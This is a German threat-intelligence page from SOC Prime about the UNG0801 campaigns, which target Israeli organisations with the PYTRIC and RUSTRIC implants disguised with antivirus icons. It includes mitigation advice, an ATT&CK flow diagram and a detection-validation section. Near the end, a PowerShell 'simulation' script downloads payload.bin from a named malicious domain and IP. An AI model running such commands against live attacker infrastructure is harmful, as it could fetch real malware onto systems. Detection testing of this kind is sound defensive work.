SOC Prime Bias: Kritisch

30 Dez. 2025 16:40
newspaper icon Seqrite

UNG0801: Israel-gezielte Bedrohungsaktivität durch AV-Icon-Spoofing

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
UNG0801: Israel-gezielte Bedrohungsaktivität durch AV-Icon-Spoofing
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Der Bericht skizziert zwei verbundene Kampagnen, die bösartige PDF- und Word-Dokumente nutzen, um Payloads bereitzustellen, die Antivirus-Symbole imitieren und auf israelische Organisationen abzielen. Eine Spur platziert PYTRIC, ein PyInstaller-verpacktes Python-Implantat, während die andere RUSTRIC bereitstellt, ein auf Rust basierendes Implantat, das über ein makrofähiges Word-Dokument gestartet wird. Beide Payloads sammeln Host-Details, führen Systembefehle aus und untersuchen installierte Sicherheitssoftware; PYTRIC enthält zusätzlich destruktive Funktionen. Die Zustellung erfolgt über Spear-Phishing-Anhänge und cloudbasierte Links (einschließlich Dropbox), wobei Telegram für die Steuerung und Kontrolle verwendet wird.

Untersuchung

SEQRITE Labs analysierte die anfänglichen Phishing-Köder, extrahierte eingebettete Makros und rekonstruierte die ausgelöste Payload-Kette. PYTRIC wurde als PyInstaller-Bundle mit Routinen zur Dateierkennung und Löschung bestätigt, und Analysten beobachteten Telegram-Bot-Anmeldedaten, die mit Backup2040 in Verbindung stehen. RUSTRIC wurde als Rust-Binärdatei profiliert, die nach achtundzwanzig Antivirusprodukten sucht und eine hex-kodierte Payload über WMI auslöst. Eine Infrastruktur-Analyse verband die Zustellung mit einem Dropbox-Link und einer Domain, die zu einer bereits mit netvigil.org.

Minderung

Schulen Sie Benutzer, unaufgefordert zugesandte PDF- und Word-Anhänge mit Vorsicht zu behandeln—insbesondere Dateien, die als Sicherheitstools oder mit Antiviren-Utilities präsentiert werden. Konfigurieren Sie E-Mail-Sicherheit so, dass Dokumente mit Makros blockiert werden und URLs, die auf Cloudspeicher-Hosts für die Payload-Zustellung verweisen, markiert oder eingeschränkt werden. Auf Endpunkten überwachen Sie die Ausführung von PyInstaller, ungewöhnliche WMI-Prozesserstellungen und verdächtige Aufrufe integrierter Dienstprogramme wie whoami, hostname und nslookup. Die Blockierung identifizierter bösartiger Domains und IPs kann den Infektionspfad weiter beeinträchtigen.

Reaktion

Wenn Aktivität erkannt wird, isolieren Sie das betroffene System, bewahren Sie flüchtige Daten auf und sammeln Sie die bösartigen Dokumente für eine hashbasierte Triage. Stoppen Sie verdächtige durch WMI gestartete Prozesse und entfernen Sie ausgelöste Payloads aus üblichen Speicherorten wie dem Downloads-Ordner. Führen Sie eine forensische Validierung auf Datei-Lösch- oder Wischaktivitäten durch, setzen Sie möglicherweise kompromittierte Anmeldedaten zurück und überwachen Sie nachfolgende Telegram-C2-Kommunikationen.

„graph TB %% Klassendefinitionen classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#c2f0c2 classDef malware fill:#ff9999 classDef process fill:#dddddd classDef operator fill:#ff9900 %% Aktionsknoten attack_phishing[„<b>Aktion</b> – <b>T1566.001 Phishing: Spearphishing-Anhang</b><br/>Opfer erhalten E-Mails mit bösartigen PDF- oder Word-Anhängen.“] class attack_phishing action attack_user_exec[„<b>Aktion</b> – <b>T1204.002 Benutzer-Ausführung: Bösartige Datei</b><br/>Das Opfer öffnet die bösartige PDF- oder Word-Datei, wodurch die Ausführung ausgelöst wird.“] class attack_user_exec action attack_ingress_transfer[„<b>Aktion</b> – <b>T1105 Ingress Tool Transfer</b><br/>Das PDF weist das Opfer an, eine zweite Payload-Stufe von Dropbox herunterzuladen.“] class attack_ingress_transfer action attack_exec_python[„<b>Aktion</b> – <b>T1059.006 Befehls- und Skript-Interpreter: Python</b><br/>PYTRIC (mit PyInstaller gepackte Python-Datei) läuft auf dem Host.“] class attack_exec_python action attack_exec_vb[„<b>Aktion</b> – <b>T1059.005 Befehls- und Skript-Interpreter: Visual Basic</b><br/>VBA-Makros im Word-Dokument dekodieren und schreiben die endgültige Nutzlast auf die Festplatte.“] class attack_exec_vb action attack_masquerade[„<b>Aktion</b> – <b>T1036.005 Verschleierung: Passender legitimer Name oder Standort</b><br/>Binärdateien sind so benannt, dass sie vertrauenswürdige Antivirus-Anbieter (Check Point, SentinelOne) imitieren.“] class attack_masquerade action attack_obfuscate[„<b>Aktion</b> – <b>T1027 Verschleierte Dateien oder Informationen</b><br/>Die Nutzlast ist hexkodiert in das Makro eingebettet, um statische Erkennung zu vermeiden.“] class attack_obfuscate action attack_proxy_exec[„<b>Aktion</b> – <b>T1218 System-Binär-Proxyausführung</b><br/>Legitime Binärdateien (wmic, whoami.exe, hostname.exe, nslookup.exe) werden verwendet, um Befehle auszuführen.“] class attack_proxy_exec action attack_wmi[„<b>Aktion</b> – <b>T1047 Windows-Verwaltungsinstrumentation</b><br/>RUSTRIC wird über WMI (Win32_Process.Create) gestartet.“] class attack_wmi action attack_sw_discovery[„<b>Aktion</b> – <b>T1518.001 Sicherheit-Software-Erkennung</b><br/>RUSTRIC listet 28 Antivirus/EDR-Produkte auf, indem bekannte Pfade und Prozesse überprüft werden.“] class attack_sw_discovery action attack_process_discovery[„<b>Aktion</b> – <b>T1057 Prozessentdeckung</b><br/>RUSTRIC listet laufende Prozesse auf dem Endpunkt auf.“] class attack_process_discovery action attack_c2_web[„<b>Aktion</b> – <b>T1071.001 Anwendungsprotokoll: Webprotokolle</b><br/>Implantate kommunizieren über Standard-Webprotokolle mit C2.“] class attack_c2_web action attack_c2_port[„<b>Aktion</b> – <b>T1571 Nicht-Standard-Port</b><br/>Die Kommunikation erfolgt über HTTPS auf Port 443.“] class attack_c2_port action attack_subvert_trust[„<b>Aktion</b> – <b>T1553 Vertrauenssteuerungen untergraben</b><br/>Binärdateien werden mit Icons/Branding legitimer Sicherheitsanbieter verschleiert.“] class attack_subvert_trust action attack_impair_defenses[„<b>Aktion</b> – <b>T1562.011 Abwehrmaßnahmen beeinträchtigen: Sicherheitswarnungen vortäuschen</b><br/>Gefälschte Sicherheitswarnungen verstärken das vertrauenswürdige Erscheinungsbild bösartiger Binärdateien.“] class attack_impair_defenses action %% Werkzeugknoten tool_wmic[„<b>Werkzeug</b> – <b>Name</b>: wmic<br/><b>Beschreibung</b>: Befehlszeilen-Dienstprogramm für Windows-Verwaltungsinstrumentation.“] class tool_wmic tool tool_whoami[„<b>Werkzeug</b> – <b>Name</b>: whoami.exe<br/><b>Beschreibung</b>: Gibt den aktuellen Benutzernamen aus.“] class tool_whoami tool tool_hostname[„<b>Werkzeug</b> – <b>Name</b>: hostname.exe<br/><b>Beschreibung</b>: Gibt den Hostnamen des Computers zurück.“] class tool_hostname tool tool_nslookup[„<b>Werkzeug</b> – <b>Name</b>: nslookup.exe<br/><b>Beschreibung</b>: DNS-Abfrage-Dienstprogramm.“] class tool_nslookup tool %% Dateiknoten file_malicious_pdf[„<b>Datei</b> – <b>Name</b>: Bösartige PDF<br/><b>Zweck</b>: Bereitstellungsmethode für anfängliche Anweisung.“] class file_malicious_pdf file file_malicious_word[„<b>Datei</b> – <b>Name</b>: Bösartige Word<br/><b>Zweck</b>: Enthält VBA-Makro, das die endgültige Nutzlast dekodiert.“] class file_malicious_word file file_dropbox[„<b>Datei</b> – <b>Name</b>: Dropbox-Payload-Link<br/><b>Zweck</b>: Hält die zweite PYTRIC-Ausführungsstufe bereit.“] class file_dropbox file %% Malware-Knoten malware_pytric[„<b>Malware</b> – <b>Name</b>: PYTRIC<br/><b>Beschreibung</b>: Mit PyInstaller gepacktes Python-Backdoor.“] class malware_pytric malware malware_rustric[„<b>Malware</b> – <b>Name</b>: RUSTRIC<br/><b>Beschreibung</b>: WMI-ausgeführte Komponente für Entdeckung und C2.“] class malware_rustric malware %% Operator-Knoten für Verzweigung op_and1((„UND“)) class op_and1 operator %% Verbindungen attack_phishing u002du002d>|liefert| file_malicious_pdf attack_phishing u002du002d>|liefert| file_malicious_word file_malicious_pdf u002du002d>|vom Opfer geöffnet| attack_user_exec file_malicious_word u002du002d>|vom Opfer geöffnet| attack_user_exec attack_user_exec u002du002d>|löst aus| attack_ingress_transfer attack_ingress_transfer u002du002d>|lädt herunter| file_dropbox file_dropbox u002du002d>|bereitstellt| malware_pytric attack_user_exec u002du002d>|führt aus| attack_exec_vb attack_exec_vb u002du002d>|schreibt| malware_rustric attack_ingress_transfer u002du002d>|führt aus| attack_exec_python attack_exec_python u002du002d>|läuft| malware_pytric malware_pytric u002du002d>|nutzt| attack_obfuscate malware_pytric u002du002d>|nutzt| attack_masquerade attack_obfuscate u002du002d>|unterstützt| attack_proxy_exec attack_masquerade u002du002d>|unterstützt| attack_proxy_exec attack_proxy_exec u002du002d>|ruft auf| tool_wmic attack_proxy_exec u002du002d>|ruft auf| tool_whoami attack_proxy_exec u002du002d>|ruft auf| tool_hostname attack_proxy_exec u002du002d>|ruft auf| tool_nslookup tool_wmic u002du002d>|startet| attack_wmi attack_wmi u002du002d>|führt aus| malware_rustric malware_rustric u002du002d>|führt durch| attack_sw_discovery malware_rustric u002du002d>|führt durch| attack_process_discovery attack_sw_discovery u002du002d>|leitet an| attack_c2_web attack_process_discovery u002du002d>|leitet an| attack_c2_web attack_c2_web u002du002d>|nutzt| attack_c2_port attack_c2_web u002du002d>|ermöglicht| attack_subvert_trust attack_c2_web u002du002d>|ermöglicht| attack_impair_defenses %% Styling class attack_phishing,attack_user_exec,attack_ingress_transfer,attack_exec_python,attack_exec_vb,attack_masquerade,attack_obfuscate,attack_proxy_exec,attack_wmi,attack_sw_discovery,attack_process_discovery,attack_c2_web,attack_c2_port,attack_subvert_trust,attack_impair_defenses action class tool_wmic,tool_whoami,tool_hostname,tool_nslookup tool class file_malicious_pdf,file_malicious_word,file_dropbox file class malware_pytric,malware_rustric malware class op_and1 operator „

Angriffsablauf

Simulationsausführung

Voraussetzung: Die Telemetrie- und Basislinien-Abflugkontrolle muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und sollen genau die Telemetriedaten erzeugen, die von der Erkennung erwartet werden. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle:
    Der Gegner hat die Domain vorregistriert stratioai.org und sie so konfiguriert, dass sie auf 159.198.68.25 (ein kompromittierter VPS) auflöst. Mit einem PowerShell-One-Liner initiieren sie ein C2-Signal, das eine kleine Payload herunterlädt und dann eine persistente Rückwärtsshell beibehält. Die ausgehende Verbindung erfolgt über HTTPS (Port 443), um sich mit normalem Datenverkehr zu vermischen, aber die Firewall protokolliert die Ziel-IP und die DNS-Abfrage, was die Sigma-Regel erfüllt.

  • Regressionstest-Skript:

    # -------------------------------------------------
# Simuliertes C2-Signal zur Validierung der Erkennung
# -------------------------------------------------
# 1. Löse die bösartige Domain (erzwingt DNS-Abfrage)
$maliciousDomain = "stratioai.org"
$resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain)
Write-Host "Aufgelöst $maliciousDomain zu $($resolved -join ', ')"

# 2. Stelle HTTPS-Verbindung zur bösartigen IP her (C2)
$maliciousIP = "159.198.68.25"
$url = "https://$maliciousDomain/payload.bin"

try {
    $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10
    Write-Host "C2-Anfrage erfolgreich, Größe: $($response.ContentLength) Bytes"
} catch {
    Write-Error "C2-Anfrage fehlgeschlagen: $_"
}

# 3. OPTIONAL: Halte den Kanal 30 Sekunden lang offen
Start-Sleep -Seconds 30
# -------------------------------------------------

  • Aufräum-Befehle:

    # Entferne alle temporären Dateien (in diesem Skript keine erstellt)
# Leere den DNS-Cache, um eine versehentliche Wiederverwendung zu vermeiden
ipconfig /flushdns
Write-Host "Bereinigung abgeschlossen."

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten